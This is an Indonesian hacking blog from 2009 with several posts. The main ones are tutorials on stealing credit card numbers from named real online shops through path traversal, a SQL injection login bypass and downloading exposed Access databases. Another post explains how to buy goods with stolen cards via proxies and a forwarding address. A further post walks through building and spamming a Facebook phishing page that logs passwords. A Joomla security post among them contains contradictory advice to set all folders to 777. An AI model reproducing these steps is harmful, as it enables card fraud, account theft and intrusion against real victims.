Cara hack deface hero dan alfa supermarket

SELAMAT DATANG SEMUANYA

diozip on June 21st, 2009

Jangan basa basi untuk bergabung disini…

berikan saran,comment & pencerahan yang membangun

Tags: anda tidak akan menyesal

info 2 Comments »
Jun
21
maling dari internet yok….
diozip on June 21st, 2009

klo km berhasil jgn sering yah..

Hallow kawan² semua, tidakkah anda tahu seberapa mudahkah anda melakukan hal ini.
Ini hanya informasi, namun kita perlu untuk mengetahuinya.
Beberapa yang biasa dilakukan didunia carding ini.

Lets Begin - Just For Share!

CGI Store Log

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm

2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi

http://www.cashwells.com/cgi-bin/store/index.cgi?page=

3. Masukkan file ini di belakang situs tadi :

../admin/files/order.log

Misal nya http://www.cashwells.com/cgi-

bin/store/index.cgi?page=../admin/files/order.log

4. Maka yang keluar di situs itu adalah nomor CC (credit card).

Admin Take Over

Disini kamu musti usaha sendiri mencari target nya.

Langkah-langkah nya :

1. http://www.partsupply.in.th/shopadmin.asp

2. Langkah selanjutnya gunakan teknik SQL Injection

user : ‘or”=’
pass : ‘or”=’

3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita
inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik.
Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba
cari lagi target lain.

Database Downloadable

Disini kamu musti usaha sendiri mencari target nya.

Langkah-langkah nya :

1. http://www.youngsliquors.com/winestore/shopadmin.asp

2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi

http://www.youngsliquors.com/winestore/

3. Masukkan file ini di belakang situs tadi :

shopdbtest.asp

Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp

4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :
xDatabase : shopping300
xDatabase :../../../../www/youngsliquors/5498761211
5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing
nya menjadi :

http://www.youngsliquors.com/winestore/shopping300.mdb

6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.

Metacart
 Disini kamu musti
usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.imagexpres.com/metacart/moreinfo.asp

2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi

http://www.imagexpres.com/metacart/

3. Masukkan file ini di belakang situs tadi :

database/metacart.mdb

Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb

6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.

PDshopPro Shopping Cart

Disini kamu musti usaha sendiri mencari target nya.

Langkah-langkah nya :

1. http://www.marktwainbooks.com/shop/category.asp?catid=4

2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi

http://www.marktwainbooks.com

3. Masukkan file ini di belakang situs tadi :

admin/dbsetup.asp

Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp

4. Maka yang keluar di situs target adalah :

Your Database Type :

Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver (*.mdb)};
DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary ’setup’ Table Found!
Database permissions OK!

5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing
nya menjadi :

http://www.marktwainbooks.com/data/pdshoppro.mdb

6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.

Cara Order Barang

Sebelum melakukan order barang, kamu musti mempunyai seorang teman di luar negeri
(misalnya USA) karna kita akan menggunakan alamat teman kita.
Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List
Order”.
Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA
maka sebelum order barang, gunakan proxy USA.
Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK.

1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab
“Add to Cart”

2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik
tab “Continue to Checkout”

3. Karna kamu Costumer baru, klik tab “Create Account”

4. Isilah data-data teman kamu (data di bawah ini adalah palsu).

5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).

6. Pilih salah satu “Shipping Method” nya.

7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.

8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman
kita (data di bawah ini adalah palsu).

9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).

10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via
email/telepon.

Contoh hasil hasil Tracking Order:

Thank you for your order.
(Order Number: 20081221000XX) Payment is now complete.

Order Number: 20081221000XX

Total Price: $1153.00

Products will be sent as soon as dispatch preparations are complete.

We look forward to serving you again.

====================================
Ini hanya sebuah informasi yang perlu anda ketahui!
Source from: jambihackerlink[dot]googlepages[dot]com
====================================
Jangan lupa baca juga:
http://www.binushacker.net/carding-tutorial-unrestricted-information.html

Tags: new
info 1 Comment »
Jun
21
Hidup Mahasiswa Indonesia..!!!
diozip on June 21st, 2009

labor_komputer UPIYPTKSaya ingin memberikan kejutan kepada dunia luar bersama

teman-teman semua SELURUH MAHASISWA Indonesia khususnya mahasiswa
UPIYPTK …

Tags: teruskan..
TUJUAN BLOG INI No comments »
Jun
21
cara hacker facebook
diozip on June 21st, 2009

Hello semua,

Hack Facebook Dengan Fake Login? Kenapa Tidak…

Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake
login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!

Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut
Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah
ulasannya:

1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan
filetype: html. Kemudian kasi nama: “index.html”, sehingga di contoh URL Web adalah:
http://www.hostingloedisini.com/facebook/index.html

Bikin Code Sesuai Dengan Contoh Script Dibawah Ini:

Scriptcode pada no 1:
Klick Disini Untuk Lihat Scriptnya

2. Buat file logs.php di hostingan lo sendiri, contoh

http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.

Scriptcode pada no 2:
Klick Disini Untuk Lihat Scriptnya
3. Buatlah file kosong yg berformat txt dengan nama: logs.txt - jadi URLnya jadi:
http://www.hostingloedisini.com/facebook/logs.txt

4. Ini wajib dan harus dilakukan! Jangan lupa change mode semua filenya, sehingga
permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat
dibaca (r), dapat ditulis(w), dan dapat di exekusi(x). Jadi chmod 777 adalah untuk
merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file
permission 777 adalah (rwxrwxrwx).

5. Kemudian sebarkan URL yang telah loe buat, misal:

“http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau
spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo
cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username +
loginnya! :D

6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya,
nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.

Contoh ujicoba aplikasi websitenya disini:

http://www.hibliz.com/media/facebook/index.html

Selamat Mencoba, Semoga Berhasil..

Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar
gak kna Fake Login:

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya:

http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.

Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak

“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan
halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang.
Kekekeke..
cara ngehack 2 Comments »
Jun
21
Lima Jurus Hacker Membobol Situs JOOMLA
diozip on June 21st, 2009

Menjadi site administrator Joomla, banyak suka dan dukanya. Salah satunya adalah situs
diusili oleh orang lain. Menangani situs joomla jumlahnya sudah seratusan, ternyata
menyisakan pengalaman pahit. Ada rasa takut, kesal, sedih, kecewa campur aduk kayak
semen. Apalagi kalau mengalami Joomla attack. Ada sekitar sepuluh situs yang diobrak-
abrik. Lima tewas di-deface, 3 abis disusupi spam dan sisanya dikirimi sampah bot-shell.
Yang mengenaskan adalah di deface. Malu sama BOS,hiks :(.

Yang diserang adalah situs yang memiliki pagerank tertinggi dan open security. Semakin
banyak backdoor yang terbuka, maka situs akan populer dibajak hacker. Sekali dibajak
akan diworo-woro ke IRC room, untuk diperkosa rame-rame. Habislah sudah situs
joomla merana? Kok bisa? Apa sih yang tak bisa di dunia ini? Semuanya saling
berlawanan. Ada hitam ada putih. Ada baik ada Jahat. Ada FPI ada AKKBB. Ada Islam
bener ada AHMADIYAH. Ada Islam benar ada JIL. Semuanya saling melengkapi.

Kembali ke topik. Kenapa situs Joomla dihack? Karena hacker tahu kelemahan situs
Joomla. Bagaimana hackers menyerang situs Joomla? Inilah jawabannya. Para hacker
menggunakan lima jurus (pertama) untuk menumbangkan situs Joomla.

Lima jurus ini merupakan hasil telusuran, diskusi dan pengalaman pribadi dalam
mengelola situs admin. Jadi saya mengundang anda untuk memberikan komentar, kritik
dan saran bila jurus yang paparkan ini adalah palsu.

Para hackers Joomla dalam menyiapkan serangan ke situs berbasis Joomla akan beberapa
strategi. Satu strategi awal dalam menyerang adalah menggunakan Lima jurus. Kelima
jurus itu terdiri dari yaitu :
1. Versi Joomla yang digunakan
2. Hostingnya dimana? Jenis hostingnya seperti apa?
3. Jenis Plugin/Extensions yang diinstall
4. File dan folder permissions
5. Ranking situs
6. Jenis situs

Biar lebih mantap dan renyah dinikmati, saya akan membeberkan jurus-jurus mematikan
ini pada anda. Mari mas..!

1. Versi Joomla yang digunakan

Semakin lama versi Joomla yang anda gunakan, anda maka semakin banyak lubang
kelemahan (vulnerabilities) situs anda. Setiap detik laporan situs Joomla dihack banyak
sekali. Laporan tentang hacking itu lalu dilaporkan dan langsung ditambal (patch). Pada
Joomla yang sudah di-patch, maka akan muncul versi Joomla terbaru. Itu artinya Kode-
skrip joomla anda harus di update. Anda cukup download bagian script yang akan
ditambal. Cukup copy-paste, maka patching sudah selesai.

Tapiiiii. Tidak semua orang peduli pada isu ini. Malas dan bosan. Saya juga sudah pernah
mengalami ini karena harus menangani situs Joomla yang terlalu banyak. Tapi kalo cuma
satu doang mungkin gak masalah. Tapi kalau banyak, penyakit bosan dan CAPEK DEh
melanda, maka updating ditinggalkan. Jangan diikuti sifat ini. Karena kalau sudah
dibajak, maka anda akan kerja bakti selama seminggu untuk memulai dari awal lagi
membangun situs. CAPEK, dehh

2. Hostingnya dimana? Jenis hostingnya seperti apa?

Bila ada ISP hosting yang tidak aman, para hackers menyusup di tempat tersebut. Pada
beberapa tempat hosting malah jadi sarang penyamun para hackers dalam mencuri data
dan menghacking situs. Kerja mereka rapi. Mereka seperi sindikat dan mafia. Mereka
sengaja menyediakan jasa hosting murah hanya untuk menjebak client. Hati-hati juga
pada free hosting. Tak ada jaminan bahwa situs anda aman. Jadi berhati-hatilah.

Tapi saya pernah punya client yang hosting di tempat murah (an) namun manajeman
sekuritinya amburadul. Untuk mencirikannya mudah saja. Pertama, biasanya situs ISP-
nya tidak profesional. Harganya murah (an) banget. Secara logis susah diterima dalam
hitungan bisnis. Jadi ada yang dikorbankan. Supportnya kacau dan minim. Sakit hati dan
kesal. Kalau ada kesalahan, client yang disalahkan. Site-adminnya kadang-kadang sok
tau. Kalau mau detail silakan mampir ke webhostingtalk atau milis web hosting di
yahoogroups.

Jadi berhati-hatilah dalam memilih hosting untuk situs Joomla anda. Kalau system
keamanan dan support meragukan, cepat-cepatlah anda berpindah. Iklaskan uang anda,
daripada anda kehilangan 100 kali lipat nantinya. Nanti akan saya bahas topik memilih
hosting yang baik dan benar untuk situs Joomla. Semoga dapat sponsor :)

3. Jenis Plugin/Extensions yang diinstall

Lobang terbesar penyerangan situs Joomla ada di sini. Semakin banyak yang terinstall
plugin/extensions disitus Joomla anda, semakin besar peluang serangan yang dilancarkan.
Banyak programmer berhati jahat yang mengubah atau memalsu skrip plugin/extensions
Joomla. Hal itu mudah mereka lakukan. Membuat skrip plugin/extensions Joomla bagi
programmer merupakan makanan sehari-hari. Para programmer jahat ini juga sering
menyusupkan skrip plugin/extensions ke forum joomla untuk didownload secara gratis.
Jadi berhati-hatilah.

4. File dan folder permissions

Ini titik kelemahan yang mudah ditemukan dengan bantuan C99 shell atau php shell. Bila
ditemukan banyak File dan folder permissions terbuka (666 atau 777) maka kiamat akan
tiba. Perbaikilah CHMOD dengan JoomlaXplorer.

Yang default terbuka adalah folder media dan images. Karena memang terbuka untuk
umum. Tapi kalau tidak perlu mohon ditutup saja. Karena ini adalah pintu utama
menghacking situs anda. Kalau situs anda untuk perusahaan, korporat, yayasan,
kelembagaan, lebih baik dimatikan saja fitur user registered berikut folder permissions-
nya. Ubah semua CHMOD folder menjadi 777.

5. Ranking situs

Semakin tinggi sebuah pohon, maka semakin kencang angin yang meniupnya. Semakin
tinggi rangking situs anda di google, yahoo dan alexa, maka semakin besar situs anda
porak-poranda. Menggunakan google, situs anda akan ada diurutan pertama saat akan

diserang. Karena situs anda sudah po puler. Para hackers

tidak punya belas kasih. Pokoknya, HAJAR BLEH.
cara ngehack No comments »
Jun
21
situs
diozip on June 21st, 2009

Mungkin cara paling mudah untuk mulai belajar teknik hacking adalah mengunjungi situs
hacking berbahasa Indonesia, daripada yang berbahasa Inggris. situs yang ada
diperlihatkan disini, yaitu:

http://www.k-elektronikorg (Kecoa Elektronik)

http://www.hackerlink.or.id
etc, silahkan share u/ semua yang tau.. okey
info No comments »
Jun
21
motivasi